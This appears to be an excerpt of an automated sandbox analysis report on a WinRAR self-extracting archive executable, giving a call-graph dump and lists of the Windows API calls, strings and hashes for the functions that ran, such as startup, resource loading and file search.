24715->24721 24717 47ad72 GetLastError 24716->24717 24720 47ad8a 24716->24720 24719 47ad7d LoadLibraryExW 24717->24719 24717->24720 24718 47ada1 FreeLibrary 24718->24721 24719->24720 24720->24718 24720->24721 24721->24709 24722 47abf0 24725 47abfb 24722->24725 24724 47ac24 24735 47ac50 DeleteCriticalSection 24724->24735 24725->24724 24726 47ac20 24725->24726 24728 47af0a 24725->24728 24729 47ac98 _unexpected 5 API calls 24728->24729 24730 47af31 24729->24730 24731 47af4f InitializeCriticalSectionAndSpinCount 24730->24731 24732 47af3a 24730->24732 24731->24732 24733 46fbbc CatchGuardHandler 5 API calls 24732->24733 24734 47af66 24733->24734 24734->24725 24735->24726 25421 4788f0 7 API calls ___scrt_uninitialize_crt 25466 46fd4f 9 API calls 2 library calls 25422 472cfb 38 API calls 4 library calls 25423 46c793 102 API calls 5 library calls 25468 469580 6 API calls 25470 46b18d 78 API calls 25425 46c793 97 API calls 4 library calls 25472 46eda7 48 API calls _unexpected 25473 46f3a0 27 API calls 25429 47a4a0 71 API calls _free 25430 46dca1 DialogBoxParamW 25431 4808a0 IsProcessorFeaturePresent 25475 456faa 111 API calls 3 library calls 24773 46f3b2 24774 46f3be ___scrt_is_nonwritable_in_current_image 24773->24774 24805 46eed7 24774->24805 24776 46f3c5 24777 46f518 24776->24777 24780 46f3ef 24776->24780 24878 46f838 4 API calls 2 library calls 24777->24878 24779 46f51f 24871 477f58 24779->24871 24790 46f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24780->24790 24816 478aed 24780->24816 24787 46f40e 24789 46f48f 24824 46f953 GetStartupInfoW __cftof 24789->24824 24790->24789 24874 477af4 38 API calls 2 library calls 24790->24874 24792 46f495 24825 478a3e 51 API calls 24792->24825 24794 46f49d 24826 46df1e 24794->24826 24799 46f4b1 24799->24779 24800 46f4b5 24799->24800 24801 46f4be 24800->24801 24876 477efb 28 API calls _abort 24800->24876 24877 46f048 12 API calls ___scrt_uninitialize_crt 24801->24877 24804 46f4c6 24804->24787 24806 46eee0 24805->24806 24880 46f654 IsProcessorFeaturePresent 24806->24880 24808 46eeec 24881 472a5e 24808->24881 24810 46eef1 24811 46eef5 24810->24811 24889 478977 24810->24889 24811->24776 24814 46ef0c 24814->24776 24817 478b04 24816->24817 24818 46fbbc CatchGuardHandler 5 API calls 24817->24818 24819 46f408 24818->24819 24819->24787 24820 478a91 24819->24820 24822 478ac0 24820->24822 24821 46fbbc CatchGuardHandler 5 API calls 24823 478ae9 24821->24823 24822->24821 24823->24790 24824->24792 24825->24794 24982 460863 24826->24982 24830 46df3d 25031 46ac16 24830->25031 24832 46df46 __cftof 24833 46df59 GetCommandLineW 24832->24833 24834 46dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24833->24834 24835 46df68 24833->24835 24836 454092 _swprintf 51 API calls 24834->24836 25065 46c5c4 83 API calls 24835->25065 24838 46e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24836->24838 25035 46b6dd LoadBitmapW 24838->25035 24839 46df6e 24841 46df76 OpenFileMappingW 24839->24841 24842 46dfe0 24839->24842 24845 46dfd6 CloseHandle 24841->24845 24846 46df8f MapViewOfFile 24841->24846 25067 46dbde SetEnvironmentVariableW SetEnvironmentVariableW 24842->25067 24845->24834 24848 46dfa0 __InternalCxxFrameHandler 24846->24848 24849 46dfcd UnmapViewOfFile 24846->24849 25066 46dbde SetEnvironmentVariableW SetEnvironmentVariableW 24848->25066 24849->24845 24854 46dfbc 24854->24849 24855 4690b7 8 API calls 24856 46e0aa DialogBoxParamW 24855->24856 24857 46e0e4 24856->24857 24858 46e0f6 Sleep 24857->24858 24859 46e0fd 24857->24859 24858->24859 24860 46e10b 24859->24860 25068 46ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24859->25068 24862 46e12a DeleteObject 24860->24862 24863 46e146 24862->24863 24864 46e13f DeleteObject 24862->24864 24865 46e177 24863->24865 24866 46e189 24863->24866 24864->24863 25069 46dc3b 6 API calls 24865->25069 25062 46ac7c 24866->25062 24869 46e17d CloseHandle 24869->24866 24870 46e1c3 24875 46f993 GetModuleHandleW 24870->24875 25200 477cd5 24871->25200 24874->24789 24875->24799 24876->24801 24877->24804 24878->24779 24880->24808 24893 473b07 24881->24893 24885 472a6f 24886 472a7a 24885->24886 24907 473b43 DeleteCriticalSection 24885->24907 24886->24810 24888 472a67 24888->24810 24936 47c05a 24889->24936 24892 472a7d 7 API calls 2 library calls 24892->24811 24894 473b10 24893->24894 24896 473b39 24894->24896 24897 472a63 24894->24897 24908 473d46 24894->24908 24913 473b43 DeleteCriticalSection 24896->24913 24897->24888 24899 472b8c 24897->24899 24929 473c57 24899->24929 24902 472ba1 24902->24885 24904 472baf 24905 472bbc 24904->24905 24935 472bbf 6 API calls ___vcrt_FlsFree 24904->24935 24905->24885 24907->24888 24914 473c0d 24908->24914 24911 473d7e InitializeCriticalSectionAndSpinCount 24912 473d69 24911->24912 24912->24894 24913->24897 24915 473c26 24914->24915 24916 473c4f 24914->24916 24915->24916 24921 473b72 24915->24921 24916->24911 24916->24912 24919 473c3b GetProcAddress 24919->24916 24920 473c49 24919->24920 24920->24916 24927 473b7e ___vcrt_InitializeCriticalSectionEx 24921->24927 24922 473bf3 24922->24916 24922->24919 24923 473b95 LoadLibraryExW 24924 473bb3 GetLastError 24923->24924 24925 473bfa 24923->24925 24924->24927 24925->24922 24926 473c02 FreeLibrary 24925->24926 24926->24922 24927->24922 24927->24923 24928 473bd5 LoadLibraryExW 24927->24928 24928->24925 24928->24927 24930 473c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 24929->24930 24931 473c71 24930->24931 24932 473c8a TlsAlloc 24931->24932 24933 472b96 24931->24933 24933->24902 24934 473d08 6 API calls ___vcrt_InitializeCriticalSectionEx 24933->24934 24934->24904 24935->24902 24939 47c077 24936->24939 24940 47c073 24936->24940 24937 46fbbc CatchGuardHandler 5 API calls 24938 46eefe 24937->24938 24938->24814 24938->24892 24939->24940 24942 47a6a0 24939->24942 24940->24937 24943 47a6ac ___scrt_is_nonwritable_in_current_image 24942->24943 24954 47ac31 EnterCriticalSection 24943->24954 24945 47a6b3 24955 47c528 24945->24955 24947 47a6c2 24948 47a6d1 24947->24948 24968 47a529 29 API calls 24947->24968 24970 47a6ed LeaveCriticalSection _abort 24948->24970 24951 47a6cc 24969 47a5df GetStdHandle GetFileType 24951->24969 24952 47a6e2 _abort 24952->24939 24954->24945 24956 47c534 ___scrt_is_nonwritable_in_current_image 24955->24956 24957 47c541 24956->24957 24958 47c558 24956->24958 24979 4791a8 20 API calls _free 24957->24979 24971 47ac31 EnterCriticalSection 24958->24971 24961 47c546 24980 479087 26 API calls __cftof 24961->24980 24963 47c550 _abort 24963->24947 24964 47c590 24981 47c5b7 LeaveCriticalSection _abort 24964->24981 24965 47c564 24965->24964 24972 47c479 24965->24972 24968->24951 24969->24948 24970->24952 24971->24965 24973 47b136 _unexpected 20 API calls 24972->24973 24978 47c48b 24973->24978 24974 47c498 24975 478dcc _free 20 API calls 24974->24975 24976 47c4ea 24975->24976 24976->24965 24977 47af0a 11 API calls 24977->24978 24978->24974 24978->24977 24979->24961 24980->24963 24981->24963 24983 46ec50 24982->24983 24984 46086d GetModuleHandleW 24983->24984 24985 4608e7 24984->24985 24986 460888 GetProcAddress 24984->24986 24987 460c14 GetModuleFileNameW 24985->24987 25079 4775fb 42 API calls __vsnwprintf_l 24985->25079 24988 4608a1 24986->24988 24989 4608b9 GetProcAddress 24986->24989 24998 460c32 24987->24998 24988->24989 24991 4608cb 24989->24991 24991->24985 24992 460b54 24992->24987 24993 460b5f GetModuleFileNameW CreateFileW 24992->24993 24994 460b8f SetFilePointer 24993->24994 24995 460c08 CloseHandle 24993->24995 24994->24995 24996 460b9d ReadFile 24994->24996 24995->24987 24996->24995 25000 460bbb 24996->25000 25001 460c94 GetFileAttributesW 24998->25001 25003 460c5d CompareStringW 24998->25003 25004 460cac 24998->25004 25070 45b146 24998->25070 25073 46081b 24998->25073 25000->24995 25002 46081b 2 API calls 25000->25002 25001->24998 25001->25004 25002->25000 25003->24998 25005 460cb7 25004->25005 25008 460cec 25004->25008 25007 460cd0 GetFileAttributesW 25005->25007 25009 460ce8 25005->25009 25006 460dfb 25030 46a64d GetCurrentDirectoryW 25006->25030 25007->25005 25007->25009 25008->25006 25010 45b146 GetVersionExW 25008->25010 25009->25008 25011 460d06 25010->25011 25012 460d73 25011->25012 25013 460d0d 25011->25013 25014 454092 _swprintf 51 API calls 25012->25014 25015 46081b 2 API calls 25013->25015 25017 460d9b AllocConsole 25014->25017 25016 460d17 25015->25016 25018 46081b 2 API calls 25016->25018 25019 460df3 ExitProcess 25017->25019 25020 460da8 GetCurrentProcessId AttachConsole 25017->25020 25021 460d21 25018->25021 25080 473e13 25020->25080 25024 45e617 53 API calls 25021->25024 25023 460dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25023->25019 25025 460d3c 25024->25025 25026 454092 _swprintf 51 API calls 25025->25026 25027 460d4f 25026->25027 25028 45e617 53 API calls 25027->25028 25029 460d5e 25028->25029 25029->25019 25030->24830 25032 46081b 2 API calls 25031->25032 25033 46ac2a OleInitialize 25032->25033 25034 46ac4d GdiplusStartup SHGetMalloc 25033->25034 25034->24832 25036 46b6fe 25035->25036 25037 46b70b GetObjectW 25035->25037 25082 46a6c2 FindResourceW 25036->25082 25041 46b71a 25037->25041 25040 46a5c6 4 API calls 25042 46b72d 25040->25042 25041->25040 25043 46b770 25042->25043 25044 46b74c 25042->25044 25046 46a6c2 13 API calls 25042->25046 25054 45da42 25043->25054 25098 46a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25044->25098 25048 46b73d 25046->25048 25047 46b754 25099 46a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25047->25099 25048->25044 25050 46b743 DeleteObject 25048->25050 25050->25044 25051 46b75d 25100 46a80c 8 API calls 25051->25100 25053 46b764 DeleteObject 25053->25043 25109 45da67 25054->25109 25059 4690b7 25060 46eb38 8 API calls 25059->25060 25061 4690d6 25060->25061 25061->24855 25063 46acab GdiplusShutdown CoUninitialize 25062->25063 25063->24870 25065->24839 25066->24854 25067->24834 25068->24860 25069->24869 25071 45b196 25070->25071 25072 45b15a GetVersionExW 25070->25072 25071->24998 25072->25071 25074 46ec50 25073->25074 25075 460828 GetSystemDirectoryW 25074->25075 25076 460840 25075->25076 25077 46085e 25075->25077 25078 460851 LoadLibraryW 25076->25078 25077->24998 25078->25077 25079->24992 25081 473e1b 25080->25081 25081->25023 25081->25081 25083 46a6e5 SizeofResource 25082->25083 25084 46a7d3 25082->25084 25083->25084 25085 46a6fc LoadResource 25083->25085 25084->25037 25084->25041 25085->25084 25086 46a711 LockResource 25085->25086 25086->25084 25087 46a722 GlobalAlloc 25086->25087 25087->25084 25088 46a73d GlobalLock 25087->25088 25089 46a7cc GlobalFree 25088->25089 25090 46a74c __InternalCxxFrameHandler 25088->25090 25089->25084 25091 46a754 CreateStreamOnHGlobal 25090->25091 25092 46a7c5 GlobalUnlock 25091->25092 25093 46a76c 25091->25093 25092->25089 25101 46a626 GdipAlloc 25093->25101 25096 46a79a GdipCreateHBITMAPFromBitmap 25097 46a7b0 25096->25097 25097->25092 25098->25047 25099->25051 25100->25053 25102 46a638 25101->25102 25104 46a645 25101->25104 25105 46a3b9 25102->25105 25104->25092 25104->25096 25104->25097 25106 46a3e1 GdipCreateBitmapFromStream 25105->25106 25107 46a3da GdipCreateBitmapFromStreamICM 25105->25107 25108 46a3e6 25106->25108 25107->25108 25108->25104 25110 45da75 _wcschr __EH_prolog 25109->25110 25111 45daa4 GetModuleFileNameW 25110->25111 25112 45dad5 25110->25112 25113 45dabe 25111->25113 25155 4598e0 25112->25155 25113->25112 25115 45db31 25166 476310 25115->25166 25116 45959a 80 API calls 25118 45da4e 25116->25118 25117 45e261 78 API calls 25120 45db05 25117->25120 25153 45e29e GetModuleHandleW FindResourceW 25118->25153 25120->25115 25120->25117 25133 45dd4a 25120->25133 25121 45db44 25122 476310 26 API calls 25121->25122 25130 45db56 ___vcrt_InitializeCriticalSectionEx 25122->25130 25123 45dc85 25123->25133 25186 459d70 81 API calls 25123->25186 25125 459e80 79 API calls 25125->25130 25127 45dc9f ___std_exception_copy 25128 459bd0 82 API calls 25127->25128 25127->25133 25131 45dcc8 ___std_exception_copy 25128->25131 25130->25123 25130->25125 25130->25133 25180 459bd0 25130->25180 25185 459d70 81 API calls 25130->25185 25131->25133 25151 45dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25131->25151 25187 461b84 MultiByteToWideChar 25131->25187 25133->25116 25134 45e159 25141 45e1de 25134->25141 25193 478cce 26 API calls 2 library calls 25134->25193 25137 45e16e 25194 477625 26 API calls 2 library calls 25137->25194 25139 45e1c6 25195 45e27c 78 API calls 25139->25195 25140 45e214 25144 476310 26 API calls 25140->25144 25141->25140 25143 45e261 78 API calls 25141->25143 25143->25141 25145 45e22d 25144->25145 25146 476310 26 API calls 25145->25146 25146->25133 25149 461da7 WideCharToMultiByte 25149->25151 25151->25133 25151->25134 25151->25149 25188 45e5b1 50 API calls __vsnprintf 25151->25188 25189 476159 26 API calls 3 library calls 25151->25189 25190 478cce 26 API calls 2 library calls 25151->25190 25191 477625 26 API calls 2 library calls 25151->25191 25192 45e27c 78 API calls 25151->25192 25154 45da55 25153->25154 25154->25059 25156 4598ea 25155->25156 25157 45994b CreateFileW 25156->25157 25158 45996c GetLastError 25157->25158 25162 4599bb 25157->25162 25159 45bb03 GetCurrentDirectoryW 25158->25159 25160 45998c 25159->25160 25161 459990 CreateFileW GetLastError 25160->25161 25160->25162 25161->25162 25164 4599b5 25161->25164 25163 4599ff 25162->25163 25165 4599e5 SetFileTime 25162->25165 25163->25120 25164->25162 25165->25163 25167 476349 25166->25167 25168 47634d 25167->25168 25179 476375 25167->25179 25196 4791a8 20 API calls _free 25168->25196 25170 476699 25172 46fbbc CatchGuardHandler 5 API calls 25170->25172 25171 476352 25197 479087 26 API calls __cftof 25171->25197 25174 4766a6 25172->25174 25174->25121 25175 47635d 25176 46fbbc CatchGuardHandler 5 API calls 25175->25176 25177 476369 25176->25177 25177->25121 25179->25170 25198 476230 5 API calls CatchGuardHandler 25179->25198 25181 459bdc 25180->25181 25183 459be3 25180->25183 25181->25130 25183->25181 25184 459785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25183->25184 25199 456d1a 77 API calls 25183->25199 25184->25183 25185->25130 25186->25127 25187->25151 25188->25151 25189->25151 25190->25151 25191->25151 25192->25151 25193->25137 25194->25139 25195->25141 25196->25171 25197->25175 25198->25179 25199->25183 25201 477ce1 _unexpected 25200->25201 25202 477cfa 25201->25202 25203 477ce8 25201->25203 25224 47ac31 EnterCriticalSection 25202->25224 25236 477e2f GetModuleHandleW 25203->25236 25206 477ced 25206->25202 25237 477e73 GetModuleHandleExW 25206->25237 25207 477d9f 25225 477ddf 25207->25225 25210 477d01 25210->25207 25212 477d76 25210->25212 25245 4787e0 20 API calls _abort 25210->25245 25216 477d8e 25212->25216 25217 478a91 _abort 5 API calls 25212->25217 25214 477dbc 25228 477dee 25214->25228 25215 477de8 25246 482390 5 API calls CatchGuardHandler 25215->25246 25218 478a91 _abort 5 API calls 25216->25218 25217->25216 25218->25207 25224->25210 25247 47ac81 LeaveCriticalSection 25225->25247 25227 477db8 25227->25214 25227->25215 25248 47b076 25228->25248 25231 477e1c 25234 477e73 _abort 8 API calls 25231->25234 25232 477dfc GetPEB 25232->25231 25233 477e0c GetCurrentProcess TerminateProcess 25232->25233 25233->25231 25235 477e24 ExitProcess 25234->25235 25236->25206 25238 477ec0 25237->25238 25239 477e9d GetProcAddress 25237->25239 25240 477ec6 FreeLibrary 25238->25240 25241 477ecf 25238->25241 25242 477eb2 25239->25242 25240->25241 25243 46fbbc CatchGuardHandler 5 API calls 25241->25243 25242->25238 25244 477cf9 25243->25244 25244->25202 25245->25212 25247->25227 25249 47b091 25248->25249 25250 47b09b 25248->25250 25252 46fbbc CatchGuardHandler 5 API calls 25249->25252 25251 47ac98 _unexpected 5 API calls 25250->25251 25251->25249 25253 477df8 25252->25253 25253->25231 25253->25232 25476 46b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25478 461bbd GetCPInfo IsDBCSLeadByte 25479 47b1b8 27 API calls 2 library calls

                                                                  Executed Functions

                                                                  Function 0046DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00460863: GetModuleHandleW.KERNEL32(kernel32), ref: 0046087C
                                                                    • Part of subcall function 00460863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0046088E
                                                                    • Part of subcall function 00460863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004608BF
                                                                    • Part of subcall function 0046A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0046A655
                                                                    • Part of subcall function 0046AC16: OleInitialize.OLE32(00000000), ref: 0046AC2F
                                                                    • Part of subcall function 0046AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0046AC66
                                                                    • Part of subcall function 0046AC16: SHGetMalloc.SHELL32(00498438), ref: 0046AC70
                                                                  • GetCommandLineW.KERNEL32 ref: 0046DF5C
                                                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0046DF83
                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0046DF94
                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0046DFCE
                                                                    • Part of subcall function 0046DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0046DBF4
                                                                    • Part of subcall function 0046DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0046DC30
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0046DFD7
                                                                  • GetModuleFileNameW.KERNEL32(00000000,004AEC90,00000800), ref: 0046DFF2
                                                                  • SetEnvironmentVariableW.KERNEL32(sfxname,004AEC90), ref: 0046DFFE
                                                                  • GetLocalTime.KERNEL32(?), ref: 0046E009
                                                                  • _swprintf.LIBCMT ref: 0046E048
                                                                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0046E05A
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0046E061
                                                                  • LoadIconW.USER32(00000000,00000064), ref: 0046E078
                                                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0046E0C9
                                                                  • Sleep.KERNEL32(?), ref: 0046E0F7
                                                                  • DeleteObject.GDI32 ref: 0046E130
                                                                  • DeleteObject.GDI32(?), ref: 0046E140
                                                                  • CloseHandle.KERNEL32 ref: 0046E183
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzJ
                                                                  • API String ID: 3049964643-581230229
                                                                  • Opcode ID: 711cc69a291f68beff2f589b7df119c516ab661f026d250d3c9704791accc992
                                                                  • Instruction ID: c2ca003a4ce9173adf42e3020ebf189cb6507a4dc4c2652e24faa8f802fb6821
                                                                  • Opcode Fuzzy Hash: 711cc69a291f68beff2f589b7df119c516ab661f026d250d3c9704791accc992
                                                                  • Instruction Fuzzy Hash: 5661C471904205ABD320AF669C49B6B3BD8AB56B09F00043FF945922A1EB7C9944C76E
                                                                  Function 0046A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 888 46a6c2-46a6df FindResourceW 889 46a6e5-46a6f6 SizeofResource 888->889 890 46a7db 888->890 889->890 892 46a6fc-46a70b LoadResource 889->892 891 46a7dd-46a7e1 890->891 892->890 893 46a711-46a71c LockResource 892->893 893->890 894 46a722-46a737 GlobalAlloc 893->894 895 46a7d3-46a7d9 894->895 896 46a73d-46a746 GlobalLock 894->896 895->891 897 46a7cc-46a7cd GlobalFree 896->897 898 46a74c-46a76a call 470320 CreateStreamOnHGlobal 896->898 897->895 901 46a7c5-46a7c6 GlobalUnlock 898->901 902 46a76c-46a78e call 46a626 898->902 901->897 902->901 907 46a790-46a798 902->907 908 46a7b3-46a7c1 907->908 909 46a79a-46a7ae GdipCreateHBITMAPFromBitmap 907->909 908->901 909->908 910 46a7b0 909->910 910->908
                                                                  APIs
                                                                  • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0046B73D,00000066), ref: 0046A6D5
                                                                  • SizeofResource.KERNEL32(00000000,?,?,?,0046B73D,00000066), ref: 0046A6EC
                                                                  • LoadResource.KERNEL32(00000000,?,?,?,0046B73D,00000066), ref: 0046A703
                                                                  • LockResource.KERNEL32(00000000,?,?,?,0046B73D,00000066), ref: 0046A712
                                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0046B73D,00000066), ref: 0046A72D
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0046A73E
                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0046A762
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0046A7C6
                                                                    • Part of subcall function 0046A626: GdipAlloc.GDIPLUS(00000010), ref: 0046A62C
                                                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0046A7A7
                                                                  • GlobalFree.KERNEL32(00000000), ref: 0046A7CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                  • String ID: PNG
                                                                  • API String ID: 211097158-364855578
                                                                  • Opcode ID: 06507778371d5ff818bb8fee5d6b60f20289adc9857036221290c2d5a8536376
                                                                  • Instruction ID: dc7768be72dc322dcc6acd9e91084d196f5ed0603d1bbc621c3c4e7864ba8766
                                                                  • Opcode Fuzzy Hash: 06507778371d5ff818bb8fee5d6b60f20289adc9857036221290c2d5a8536376
                                                                  • Instruction Fuzzy Hash: AC319375600702AFD7109F21EC88D1BBBB9EF84B52B04092FF80592621EB35DD54DF6A
                                                                  Function 0045A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1040 45a69b-45a6bf call 46ec50 1043 45a727-45a730 FindNextFileW 1040->1043 1044 45a6c1-45a6ce FindFirstFileW 1040->1044 1046 45a742-45a7ff call 460602 call 45c310 call 4615da * 3 1043->1046 1047 45a732-45a740 GetLastError 1043->1047 1045 45a6d0-45a6e2 call 45bb03 1044->1045 1044->1046 1055 45a6e4-45a6fc FindFirstFileW 1045->1055 1056 45a6fe-45a707 GetLastError 1045->1056 1053 45a804-45a811 1046->1053 1049 45a719-45a722 1047->1049 1049->1053 1055->1046 1055->1056 1058 45a717 1056->1058 1059 45a709-45a70c 1056->1059 1058->1049 1059->1058 1061 45a70e-45a711 1059->1061 1061->1058 1063 45a713-45a715 1061->1063 1063->1049
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A6C4
                                                                    • Part of subcall function 0045BB03: _wcslen.LIBCMT ref: 0045BB27
                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A6F2
                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A6FE
                                                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A728
                                                                  • GetLastError.KERNEL32(?,?,?,?,0045A592,000000FF,?,?), ref: 0045A734
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                  • String ID:
                                                                  • API String ID: 42610566-0
                                                                  • Opcode ID: 5d4a266f94322f013fb81f064610cba47d5addbc39637f822b48431aaea7f7ef
                                                                  • Instruction ID: 8b660e4662e534aba667caba4c5f8989625e675dbc5a53772ef48493cf7a5883
                                                                  • Opcode Fuzzy Hash: 5d4a266f94322f013fb81f064610cba47d5addbc39637f822b48431aaea7f7ef
                                                                  • Instruction Fuzzy Hash: 8741A332900115ABC715DF64CC88AEEB3B8FB48351F14029BE959E3201D738AEA4CF99
                                                                  Function 00477DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00477DC4,00000000,0048C300,0000000C,00477F1B,00000000,00000002,00000000), ref: 00477E0F
                                                                  • TerminateProcess.KERNEL32(00000000,?,00477DC4,00000000,0048C300,0000000C,00477F1B,00000000,00000002,00000000), ref: 00477E16
                                                                  • ExitProcess.KERNEL32 ref: 00477E28
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentExitTerminate
                                                                  • String ID:
                                                                  • API String ID: 1703294689-0
                                                                  • Opcode ID: 50cbeb7fb286196c91a4bbb022d3c3abf7a5aa5c06656794caff3d581f8a5261
                                                                  • Instruction ID: db0a4902a7c049e8c8903474bbdd1d2f544609dc1a12d38b0d813c71a4a00995
                                                                  • Opcode Fuzzy Hash: 50cbeb7fb286196c91a4bbb022d3c3abf7a5aa5c06656794caff3d581f8a5261
